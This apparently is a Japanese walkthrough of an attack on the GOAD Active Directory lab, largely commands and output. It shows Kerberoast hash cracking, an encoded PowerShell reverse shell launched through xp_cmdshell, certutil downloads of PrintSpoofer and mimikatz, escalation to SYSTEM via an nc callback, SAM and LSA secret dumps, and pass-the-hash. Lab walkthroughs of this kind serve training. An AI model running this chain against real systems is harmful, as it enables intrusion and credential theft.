2a5c37111cf8eae606a0ef78a93ab43a616075cbffb3f32290c16a712aa91ca6d4ad948d3a293a8250053c1c42a2f85f482adb2db27ab232df723cb04685832c12074d58f7a367c607fec7e64cd8e6ce2785aeb19f39cf594322ac3cc9d0dd1df8575a34bf43f9e6a9a48f4b34869c140729f2e840ccd85e12f0b4bbbe320829808eaa20821963ba99b3c53e944bad33eb40a9bf6dd0fb435012db27c2b2cd1da77dd45eaeec99d25f271ab1dfd53c7f288857e11a46513327b6864ca318952adc64a592d70bdc5423e197599adf1528204942eae617acc46bf8ce3981b4997d9ad0e081f97e346be53276ae681e47107d84a170c7897e2639360e854b354fc636a76330f7782f0d9c291fc34fb0f6757f5bc3136da99a801b40a095a5366495dada35d7f145462f
$krb5tgs$23$*jon.snow$NORTH.SEVENKINGDOMS.LOCAL$north.sevenkingdoms.local/jon.snow*$1e15ebd4698ad759a436a2f71a909132$b42a5b1a30e777ad8d7c601960a2dff52b1a169e622c7ec19b8590db742d2193e37c045574f6c64c63b945e43fb29d98dd7ef949486ecd8aa777f05af301d82bb09976c36c05875e56a6c28407d42a5414fb221a10dac81c1bcc2ce3b79b9a8256795352b1e484093d620ce7661ef114d9dc32f17198690da6194b428c4d9ef129e0712d464bf7e0678d4ad98ab4891e1ee08f22f2431fd854f897c969afec28a69116d61c3754bfc996ceff186556e3829e65f0e8f4a283aa29da68fadd1d3f114ede4209463dbdf440c379af909b24546a94cfe7b011835991ebcc8ecbc85ec466b3eb3efe14f74f120504e90aff3a372ab6ffabfde83bebeaaca06120dd911220aa7ed90b7dd7f8c616598ca0e65b1d3cbd9634cb642cd921dd0a5f358289de761cfafad823e44fd3ab88198034468e8856b566f83308b3e96da3b453f152c8fe43fe6d8b56fa8964f9316154ed02e4e9b163df1d1444d52973424a298ee42565dd78ffbff60c9550370a35601bc0eeb36d4933ed4d183ea160513095641d6fae94ad3be51480b5de42ea9b3d0f3c4b0099af4788d4cee8a46385e5c8cb1a76372d53dae6360987327ccf896af81ef15133dc656ad5c76fb63f4469b7fe2024be0e78385228016c6cfdcd75a43698d1e420dd3be51acd362cabd31464e97c42a5c372bf12d745c86b7fd091e531aa59d64849b531a5e2cc798a83ec35c00b61638abfb30d7a0e43c066c7d6135b33207ec04ee52079b4c949b78a7f1fed453a6a6699276beba0f8ee8a81ce031ea8ddb47167b8115f5722196215d493ee8b284a24f7e9b3bfdce880aecd5753fd29fe72596838acc20170162e5982f82446799f82d17080c14456a7d32b7f6116183042a7699fa88a3739e01a8723763c3ec6dc861acf19a173cac258c82373e13fcbcadf39e447bad2c5fcc9272d456f5db378372eff4e0fc77ff78c59266ba32110f9a5e7cec3945c4dcd8c2f6816c25026622cea4831eaa2bc00fe05e15e5d2e694477e827de1bac27ac4dd33e0108ed0b3eebf500252eade9d2f8a575996f19d109a4cae73d3ae903f0f28be17281a9e13e83b43a47d13e2e60886dce9e92c65e80f8b87931491446af43fe34b7070e9b9b74b3f34e60de5871032408b60cae961a83c938243a6d800cc75e008b52b44a5212b1c9ca95b935c8c8cfc20988b23939e4e71b7f3a44331936374001ea35784201dca58d6bb18ee83eae94e1697b12b2eff215bf2ddfd92340e01c91dfcab5d0b800d2602a9819b0efb3360c8d0edef56ad368ed36fb3b1080e1227ca051ab708a4a4cc37e412880f9609c56b5c34d1bfd82c8e31cce1bedf3eb8daa3769505ab2ad67b2e76589bf3f01e823e3b9db0ad0da1eb06950e3966f31c6cdb1fded9fd85151a38a2a316f28299ab8b33f17a8cd583c5b2eaddec0c74c20158303ac8ec7111eabbe8acc1f4006b4cf6090a07f91df
$krb5tgs$23$*sql_svc$NORTH.SEVENKINGDOMS.LOCAL$north.sevenkingdoms.local/sql_svc*$f2afc954ac537ec194d071e3bd454869$650ddbd0f20df022ed076fdb9d60d0fb143740a99dd20148f0e886f11ac2f50ea381a95cacc705cf41671e136490303763ebf7b5eab1103effa651180048a6f05048e1afa18e698af1e58c04025cdef18a7bc7111150320c43729c22aeb013e1f479c8f94100454f8325297fa870980d5d1e83fcdc6eb38d8d615a9b5da2fe960d417d3bc58ee76fffe1d86b0607a14b39ed332da4a89cc6adef87e7a4272d5d1db21ce301ebb3e56cb064196a1ea085181ce2147b6c401a48013b22ba0fb0e87d2c2f7fed42d6ef75e271b9aa9271719d9b2e84c72f5750c79a3064d8b2b3db0cdfccdbbbf932d6479c4bd1e62b547a46c08c14965e7095cb9038f6277046b66d7a45ec27ec17d5b74cc92a5b666b66a8f3ad00b216758f8f242b539743fa7f4f51120c3997a0a4393a9495d439fcbe68d9e45ebb5ff286640996bd1d20fc87a5cf2a24ef485377bfa9e76faf488ac671a3f16fdccc70706a2cfd326eb906b9658cd6afb4416dd4cb997012a5ca852e036c2da07099eac16660358a745b9c20a7d938fd01f1ab14e8adfe6f815944219c2f562fdc654706955e9dc3cd3723feac6d8ce4d023d5073c014eeb00881ffaecd266a04ee3f3fcc5a48e828c9591651276384db62da09854a4dc8e05a92efdba019e50bdf91c99f33e28179fad748e4485231d40f7d8dc04f0ca662ec14b9b03b7746f8bc55ee91053f004b91e5f7ea37afa089e014b1ad9efb33e13872c6e8b1178a0ab3835853c807b63cabc4b28a4e665f37ad2d0f108e886f4eb0fcd33725f59a3a588f850cbdce293e62f71d2537e34fa6bbc86f5f334b19f192d2958a18f285e2288c52ec38281e58c12d2b530cacbc071148cc6d1ff8a56904cd50b696fa315f97d2b5770c14c2f657e5c895a645267d84ac4efb4a3f8c6212506cf3d4467313eadb539381a098de77b9225f955c62b3b420d65401b36c781d49f5385095bbd8090e8f41642784119f68293418918662c16967703a474fb642f67bcad30af48bf7e75cc894844c00efc24a9b54cb9906cbc3f078b5f5f77494520dbfde3df18ca7dd55198fe0808a44e76ad96b75e8b492a45d1ffafcd09382af624fff3d21aab254970222fcc1bd5b101f8974cc84f7d4077d4f5f36460f8265af6ee7a2ab9078b91df8145975e25b605c5f254ba2eae75a4e4ef6de1e1ca0618e6f6138277d72788f9ee044ca5b514561c7a4a5d643bcefc9bfc6628a0a1d4c79d12ace8717704a0fb75159dd0728a0e214d30b4b72230932b320239c262a2cae8eac5d1a06709fbbba7200f4b683caf10d5361697df2ae2dc23c6517594c5b2653e50f865a6fd418b9a55fa33748c498bc0c114ae832bdd121f0f11bc4dd8618aaabe81aa011c09865f6661769fca1adcf34d4eb87d63224b8c3e2f19884cb1227f31b64463354ea03d86c36bef9a83fb3cd01917b87cb4e97d5c6667b71d3b41f20817e9
constrainedなユーザーのjon.snowのハッシュをクラックしてみる
┌──(kali㉿kali)-[~/goad/winterfell]
└─$ john --format=krb5tgs jon.snow.krb5tgts --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
iknownothing (?)
1g 0:00:00:02 DONE (2024-10-06 16:09) 0.3378g/s 2511Kp/s 2511Kc/s 2511KC/s ikulet..ikkezelf85
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
jon.snow/iknownothing
というクレデンシャルをゲット
┌──(kali㉿kali)-[~/goad/winterfell]
└─$ nxc mssql 192.168.56.10-12 192.168.56.22-23 -u jon.snow -p 'iknownothing'
MSSQL 192.168.56.22 1433 CASTELBLACK [*] Windows 10 / Server 2019 Build 17763 (name:CASTELBLACK) (domain:north.sevenkingdoms.local)
MSSQL 192.168.56.22 1433 CASTELBLACK [+] north.sevenkingdoms.local\jon.snow:iknownothing (Pwn3d!)
MSSQL 192.168.56.23 1433 BRAAVOS [*] Windows 10 / Server 2016 Build 14393 (name:BRAAVOS) (domain:essos.local)
MSSQL 192.168.56.23 1433 BRAAVOS [-] essos.local\jon.snow:iknownothing (Login failed for user 'BRAAVOS\Guest'. Please try again with or without '--local-auth')
Running nxc against 5 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00
jon.snowはCASTELBLACKのmssqlにアクセスできる
MSSQL Exploit
MSSQL経由で侵入してみる
$ impacket-mssqlclient north.sevenkingdoms.local/jon.snow:iknownothing@castelblack -windows-auth
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(CASTELBLACK\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(CASTELBLACK\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL (NORTH\jon.snow dbo@master)>
このサーバーのシステム管理者が誰なのか確認してみる
SQL (NORTH\jon.snow dbo@master)> select loginname from syslogins where sysadmin = '1'
loginname
---------------------------
sa
NORTH\sql_svc
NT SERVICE\SQLWriter
NT SERVICE\Winmgmt
NT SERVICE\MSSQL$SQLEXPRESS
CASTELBLACK\vagrant
NORTH\jon.snow
ユーザー jon.snow が sysadmin としてリストされていることがわかる
xp_cmdshell
を下記コマンドで有効にする
enable_xp_cmdshell
下記サイトでリバースシェルを作る
ncで待ち受けまる
$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host noprefixroute
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 08:00:27:c7:e1:36 brd ff:ff:ff:ff:ff:ff
inet 10.0.2.15/24 brd 10.0.2.255 scope global dynamic noprefixroute eth0
valid_lft 72631sec preferred_lft 72631sec
inet6 fe80::e4c7:3d51:e066:24c9/64 scope link noprefixroute
valid_lft forever preferred_lft forever
3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 08:00:27:58:30:f4 brd ff:ff:ff:ff:ff:ff
inet 192.168.56.104/24 brd 192.168.56.255 scope global dynamic noprefixroute eth1
valid_lft 334sec preferred_lft 334sec
inet6 fe80::5af0:79:dd52:80d1/64 scope link noprefixroute
valid_lft forever preferred_lft forever
┌──(kali㉿kali)-[~/goad/castelblack]
└─$ rlwrap nc -lvnp 443
MSSQLで実行
SQL (NORTH\jon.snow dbo@master)> sp_configure 'show advanced options', '1'
[*] INFO(CASTELBLACK\SQLEXPRESS): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (NORTH\jon.snow dbo@master)> reconfigure
SQL (NORTH\jon.snow dbo@master)> sp_configure 'xp_cmdshell', 1
[*] INFO(CASTELBLACK\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (NORTH\jon.snow dbo@master)> reconfigure
SQL (NORTH\jon.snow dbo@master)> xp_cmdshell powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5ADIALgAxADYAOAAuADUANgAuADEAMAA0ACIALAA0ADQAMwApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA=
Reverse shellを取得できた
┌──(kali㉿kali)-[~]
└─$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host noprefixroute
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 08:00:27:c7:e1:36 brd ff:ff:ff:ff:ff:ff
inet 10.0.2.15/24 brd 10.0.2.255 scope global dynamic noprefixroute eth0
valid_lft 85785sec preferred_lft 85785sec
inet6 fe80::e4c7:3d51:e066:24c9/64 scope link noprefixroute
valid_lft forever preferred_lft forever
3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 08:00:27:58:30:f4 brd ff:ff:ff:ff:ff:ff
inet 192.168.56.104/24 brd 192.168.56.255 scope global dynamic noprefixroute eth1
valid_lft 586sec preferred_lft 586sec
inet6 fe80::5af0:79:dd52:80d1/64 scope link noprefixroute
valid_lft forever preferred_lft forever
┌──(kali㉿kali)-[~]
└─$ rwlap nc -lvnp 443
rwlap: command not found
┌──(kali㉿kali)-[~]
└─$ rlwrap nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.56.104] from (UNKNOWN) [192.168.56.22] 55053
PS C:\Windows\system32>
権限を見てみる
PS C:\Windows\system32> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
PS C:\Windows\system32>
SeImpersonatePrivilege
が有効なので PrintSpoofer が使えるか試してみる
https://github.com/itm4n/PrintSpoofer
ひとまず手元の環境
┌──(kali㉿kali)-[~/goad/castelblack]
└─$ ls
castelblack.nmap nc.exe PrintSpoofer64.exe SharpHound.ps1
mimikatz.exe powerview.ps1 SharpHound.exe
┌──(kali㉿kali)-[~/goad/castelblack]
└─$ python2 -m SimpleHTTPServer 8080
Serving HTTP on 0.0.0.0 port 8080 ...
(Python3の組み込みHTTPサーバーがうまく動かなかったのでPython2で動かしている)
Castelblack側で下記のように /tmp
に移動する。諸々のツール類を運び込んだりする作業はここで行う
PS C:\Windows\system32> cd /tmp
PS C:\tmp> certutil -urlcache -split -f http://192.168.56.104:8080/nc.exe
**** Online ****
0000 ...
e800
CertUtil: -URLCache command completed successfully.
PS C:\tmp> certutil -urlcache -split -f http://192.168.56.104:8080/PrintSpoofer64.exe
**** Online ****
0000 ...
6a00
CertUtil: -URLCache command completed successfully.
Kali側でncでポートを開けておく
┌──(kali㉿kali)-[~]
└─$ rlwrap nc -lvnp 80
listening on [any] 80 ...
PowerShellでPrintSpooferを動かす
PS C:\tmp> .\PrintSpoofer64.exe -i -c ".\nc.exe 192.168.56.104 80 -e powershell"
リバースシェルが帰ってきている。whoamiでシステム管理者の権限があることが確認できる。
┌──(kali㉿kali)-[~]
└─$ rlwrap nc -lvnp 80
listening on [any] 80 ...
connect to [192.168.56.104] from (UNKNOWN) [192.168.56.22] 55063
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Windows\system32>
PS C:\Windows\system32> whoami
whoami
nt authority\system
PS C:\Windows\system32> whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
========================================= ================================================================== =======
SeCreateTokenPrivilege Create a token object Enabled
SeAssignPrimaryTokenPrivilege Replace a process level token Enabled
SeLockMemoryPrivilege Lock pages in memory Enabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
SeTcbPrivilege Act as part of the operating system Enabled
SeSecurityPrivilege Manage auditing and security log Enabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemProfilePrivilege Profile system performance Enabled
SeSystemtimePrivilege Change the system time Enabled
SeProfileSingleProcessPrivilege Profile single process Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled
SeCreatePagefilePrivilege Create a pagefile Enabled
SeCreatePermanentPrivilege Create permanent shared objects Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeDebugPrivilege Debug programs Enabled
SeAuditPrivilege Generate security audits Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeTrustedCredManAccessPrivilege Access Credential Manager as a trusted caller Enabled
SeRelabelPrivilege Modify an object label Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
SeCreateSymbolicLinkPrivilege Create symbolic links Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled
今度はmimikatzを運んで見る
$ cp /usr/share/windows-resources/mimikatz/x64/mimikatz.exe .
┌──(kali㉿kali)-[~/goad/castelblack]
└─$ python2 -m SimpleHTTPServer 8080
Serving HTTP on 0.0.0.0 port 8080 ..
PS C:\Windows\system32> certutil -urlcache -split -f http://192.168.56.104:8080/mimikatz.exe
certutil -urlcache -split -f http://192.168.56.104:8080/mimikatz.exe
**** Online ****
000000 ...
14ae00
CertUtil: -URLCache command completed successfully.
ハッシュをダンプする
PS C:\Windows\system32> ./mimikatz.exe
./mimikatz.exe
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # lsadump::sam
Domain : CASTELBLACK
SysKey : e726c3449239522103313bbfa17ae832
Local SID : S-1-5-21-4014308955-3248381926-711700073
SAMKey : 8ba6eb6e2d70bd1eac7ec4298c16ca0d
RID : 000001f4 (500)
User : Administrator
Hash NTLM: dbd13e1c4e338284ac4e9874f7de6ef4
Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : 3657700679fd58e85736b18c734f2374
* Primary:Kerberos-Newer-Keys *
Default Salt : VAGRANTAdministrator
Default Iterations : 4096
Credentials
aes256_hmac (4096) : e7aa0f8a649aa96fab5ed9e65438392bfc549cb2695ac4237e97996823619972
aes128_hmac (4096) : bb7b6aed58a7a395e0e674ac76c28aa0
des_cbc_md5 (4096) : fe58cdcd13a43243
OldCredentials
aes256_hmac (4096) : 05ebd58ad12ff00465687ed1e33e4631c4739859f369ae36a7f6fccbe795fb78
aes128_hmac (4096) : 778a45f4f133513b831ce562570ac6af
des_cbc_md5 (4096) : 58bf1ff4c4f4b0f2
OlderCredentials
aes256_hmac (4096) : aa3c962519c1e2dee9ffb53df04325424f812bba47279767ad25eaccffd18695
aes128_hmac (4096) : 2f72e6aa959c5ea08e11deabfce6ed55
des_cbc_md5 (4096) : 62bf012513ea8c0e
* Packages *
NTLM-Strong-NTOWF
* Primary:Kerberos *
Default Salt : VAGRANTAdministrator
Credentials
des_cbc_md5 : fe58cdcd13a43243
OldCredentials
des_cbc_md5 : 58bf1ff4c4f4b0f2
RID : 000001f5 (501)
User : Guest
RID : 000001f7 (503)
User : DefaultAccount
RID : 000001f8 (504)
User : WDAGUtilityAccount
Hash NTLM: 4363b6dc0c95588964884d7e1dfea1f7
Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : 03a659ee63caba3a4abb578087d86a35
* Primary:Kerberos-Newer-Keys *
Default Salt : WDAGUtilityAccount
Default Iterations : 4096
Credentials
aes256_hmac (4096) : e2d64d3002108324d20638239c935473767a9d7ed14d3fbfdfb9dca09b0ca43c
aes128_hmac (4096) : 81a21c239b02db38b36589af9ca027a5
des_cbc_md5 (4096) : d33ba768d95dc257
* Packages *
NTLM-Strong-NTOWF
* Primary:Kerberos *
Default Salt : WDAGUtilityAccount
Credentials
des_cbc_md5 : d33ba768d95dc257
RID : 000003e8 (1000)
User : vagrant
Hash NTLM: e02bc503339d51f71d913c245d35b50b
Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : 503d6e8e5de1854c6257b711e268fe30
* Primary:Kerberos-Newer-Keys *
Default Salt : VAGRANT-2019vagrant
Default Iterations : 4096
Credentials
aes256_hmac (4096) : aa97635c942315178db04791ffa240411c36963b5a5e775e785c6bd21dd11c24
aes128_hmac (4096) : 0d7c6160ffb016857b9af96c44110ab1
des_cbc_md5 (4096) : 16dc9e8ad3dfc47f
* Packages *
NTLM-Strong-NTOWF
* Primary:Kerberos *
Default Salt : VAGRANT-2019vagrant
Credentials
des_cbc_md5 : 16dc9e8ad3dfc47f
mimikatz #
mimikatz # lsadump::secrets
Domain : CASTELBLACK
SysKey : e726c3449239522103313bbfa17ae832
Local name : CASTELBLACK ( S-1-5-21-4014308955-3248381926-711700073 )
Domain name : NORTH ( S-1-5-21-2343606889-1312097775-3500245986 )
Domain FQDN : north.sevenkingdoms.local
Policy subsystem is : 1.18
LSA Key(s) : 1, default {f577e818-b2ae-c757-1ce1-c340c37c62df}
[00] {f577e818-b2ae-c757-1ce1-c340c37c62df} 0ba3686dd3c0e1bc912fad05b7544d38a2c57ffe99ae0282cde6eb1553647a56
Secret : $MACHINE.ACC
cur/hex : 11 11 80 6e 0b f8 db 39 1c b1 c0 2c 64 11 c3 4b ce 4b 04 22 53 b8 62 a6 ba a7 4e 0a 76 54 78 09 99 ff 01 c1 d5 3d 59 8e d0 8f 16 8c 35 ca 13 30 35 83 a2 33 43 a9 65 fa 4b 8f 72 af df b6 33 71 b8 f3 d6 ae b4 5d 7e 1e 3c 3f 91 d4 f1 ee a5 97 7a 41 03 0a 4e 83 60 3b 6c 4d 78 db 03 72 8b c7 9b 04 1b 02 fc 53 94 3f 14 ce 01 4e d7 fa 7c 33 5c 7e 15 04 67 b8 db a0 02 32 56 d6 f3 76 15 0c 45 c7 bd e0 63 5e 2d 1e d5 38 48 68 5f 8a dd d1 00 82 7f 32 0d 24 d0 ca 91 02 a6 ca 78 24 ec c7 99 4f 0e d4 33 c3 25 a7 e7 2d 20 96 0c e3 79 75 70 27 22 18 fb fb 88 68 fb a0 03 7a ce 07 45 9c 34 eb 05 cf 05 c0 0b 9a 78 08 26 76 e4 5a 12 83 da 88 77 2c b7 88 1a 96 31 29 98 f4 9b 2b 92 a4 57 5a 46 be 4a 2d 83 9a 0e fd 7d 6f 5d 0b 30 f0
NTLM:20425334e9f78d883485696487ab1b67
SHA1:8f582df44ed1c9e9c9d26be730c0b99226271cf4
old/text: Ne[&3Mqp!):;U8#4v*-RfAP_\r"g$aYuI UHU1ULGN>S.k:%(qp pLyzv(c+:ymAFVzKUhMjT5>)n0&x.:nEB6?vEv8G0SqH;z<uZ]08>6.rR2d-,8N%oN0a
NTLM:f2128cf1b7f7b8aba5ba5e2bc89b9439
SHA1:dd3838e03f855224da1aed2ceb1a0cdcfa4a352b
Secret : DefaultPassword
old/text: vagrant
Secret : DPAPI_SYSTEM
cur/hex : 01 00 00 00 13 08 72 a1 a2 43 87 df 59 aa e0 5e 7d 4c a0 c9 8d d5 53 5d 86 a5 36 90 af 0f cd 44 90 28 0e de 09 9b c6 84 e1 1a 69 18
full: 130872a1a24387df59aae05e7d4ca0c98dd5535d86a53690af0fcd4490280ede099bc684e11a6918
m/u : 130872a1a24387df59aae05e7d4ca0c98dd5535d / 86a53690af0fcd4490280ede099bc684e11a6918
old/hex : 01 00 00 00 f8 8a ba f4 5d f8 7a f3 1f 7a 1f 2d 8f c0 48 de 9f 8c a8 77 c0 90 ca 12 69 d8 47 13 c9 de 69 bc 50 3e ae 27 c6 ea 74 26
full: f88abaf45df87af31f7a1f2d8fc048de9f8ca877c090ca1269d84713c9de69bc503eae27c6ea7426
m/u : f88abaf45df87af31f7a1f2d8fc048de9f8ca877 / c090ca1269d84713c9de69bc503eae27c6ea7426
Secret : NL$KM
cur/hex : 22 34 01 76 01 70 30 93 88 a7 6b b2 87 43 59 69 0e 41 bd 22 0a 0c cc 23 3a 5b b6 74 cb 90 d6 35 14 ca d8 45 4a f0 db 72 d5 cf 3b a1 ed 7f 3a 98 cd 4d d6 36 6a 35 24 2d a0 eb 0f 8e 3f 52 81 c9
old/hex : 22 34 01 76 01 70 30 93 88 a7 6b b2 87 43 59 69 0e 41 bd 22 0a 0c cc 23 3a 5b b6 74 cb 90 d6 35 14 ca d8 45 4a f0 db 72 d5 cf 3b a1 ed 7f 3a 98 cd 4d d6 36 6a 35 24 2d a0 eb 0f 8e 3f 52 81 c9
Secret : _SC_MSSQL$SQLEXPRESS / service 'MSSQL$SQLEXPRESS' with username : north.sevenkingdoms.local\sql_svc
cur/text: YouWillNotKerboroast1ngMeeeeee
Secret : _SC_SQLTELEMETRY$SQLEXPRESS / service 'SQLTELEMETRY$SQLEXPRESS' with username : NT Service\SQLTELEMETRY$SQLEXPRESS
mimikatz #
ハッシュの取得に成功したのでPass-the-hashで入ってみる
┌──(kali㉿kali)-[~]
└─$ evil-winrm -u Administrator -H dbd13e1c4e338284ac4e9874f7de6ef4 -i castelblack
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>
castelblackに関してはAdministrator権限が取れた
Bloodhoundを動かそうとしたが動かない。
他のユーザーで入って試す。
まずは他のユーザーを探す
┌──(kali㉿kali)-[~/goad/castelblack]
└─$ impacket-GetADUsers -all north.sevenkingdoms.local/jon.snow:iknownothing
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Querying north.sevenkingdoms.local for information about domain.
Name Email PasswordLastSet LastLogon
-------------------- ------------------------------ ------------------- -------------------
Administrator 2024-08-10 23:08:06.949368 2024-10-11 15:59:44.725602
Guest <never> <never>
vagrant 2021-05-12 07:38:55.922520 2024-08-11 00:09:31.347502
krbtgt 2024-08-10 23:24:52.237590 <never>
2024-10-05 20:33:35.571923 <never>
arya.stark 2024-08-10 23:42:04.471887 <never>
eddard.stark 2024-08-10 23:42:06.722277 2024-10-11 22:30:53.930205
catelyn.stark 2024-08-10 23:42:08.941111 <never>
robb.stark 2024-08-10 23:42:11.065308 2024-10-11 22:32:00.399053
sansa.stark 2024-08-10 23:42:13.018886 <never>
brandon.stark 2024-08-10 23:42:14.850022 <never>
rickon.stark 2024-08-10 23:42:16.693124 <never>
hodor 2024-08-10 23:42:18.518663 <never>
jon.snow 2024-08-10 23:42:20.300231 <never>
samwell.tarly 2024-08-10 23:42:22.175246 <never>
jeor.mormont 2024-08-10 23:42:23.987353 <never>
sql_svc 2024-08-10 23:42:25.706411 2024-10-11 22:04:56.621216
よく考えてみたらDCはWinterfellだからWinterfellでSharpHound動かしたほうが良いのでは?
とりあえずnorth.sevenkingdoms.local/ でユーザーを探す
┌──(kali㉿kali)-[~/goad/winterfell]
└─$ impacket-GetNPUsers north.sevenkingdoms.local/ -no-pass -usersfile users.txt
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User arya.stark doesn't have UF_DONT_REQUIRE_PREAUTH set
